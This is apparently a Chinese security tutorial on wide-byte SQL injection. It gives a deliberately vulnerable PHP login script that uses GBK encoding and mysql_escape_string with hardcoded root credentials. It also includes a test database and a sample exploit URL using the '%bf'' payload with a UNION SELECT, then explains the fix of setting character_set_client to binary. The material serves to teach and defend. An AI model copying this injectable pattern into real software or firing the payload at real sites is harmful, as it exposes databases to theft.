宽字节注入实例
<?php
02/*
03 * code:c4bbage
04 * From:cunlide.com
05 */
06error_reporting(E_ALL);
07$conn = mysql_connect("localhost","root","toor");
08mysql_query("SET NAMES 'GBK'");
09mysql_select_db("test1",$conn);
10$username=mysql_escape_string($_GET['username']);
11//$username= addslashes($_GET['username']);
12var_dump($username);
13$password=mysql_escape_string($_GET['password']);
14$sql= "select * from admin where username='$username' and password='$password'";
15print_r($sql);echo "<br>";
16$result = mysql_query($sql,$conn);
17print_r($result);echo "<br>";
18while ($row=mysql_fetch_array($result,MYSQL_ASSOC))
19{
20 print_r($row[]=$row);
21}
www.2cto.com
22/*
23exp:
24http://127.0.0.1/sqli.php?username=%bf'union select 1,2,3%23&password=password
25db file :
26--test1.sql
27SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";
28SET time_zone = "+00:00";
29--gbk database
30CREATE DATABASE `test1` DEFAULT CHARACTER SET gbk COLLATE gbk_chinese_ci;
31USE `test1`;
32
33CREATE TABLE IF NOT EXISTS `admin` (
34 `id` int(11) NOT NULL,
35 `username` varchar(15) NOT NULL,
36 `password` varchar(15) NOT NULL,
37 PRIMARY KEY (`id`)
38) ENGINE=InnoDB DEFAULT CHARSET=gbk;
39
40INSERT INTO `admin` (`id`, `username`, `password`) VALUES
41(1, 'admin', 'password');
42
43*/
44?>
解决方法:就是在初始化连接和字符集之后,使用SET character_set_client=binary来设定客户端的字符集是二进制的。修改Windows下的MySQL配置文件一般是 my.ini,Linux下的MySQL配置文件一般是my.cnf,比如:mysql_query("SET character_set_client=binary");。character_set_client指定的是SQL语句的编码,如果设置为 binary,MySQL就以二进制来执行,这样宽字节编码问题就没有用武之地了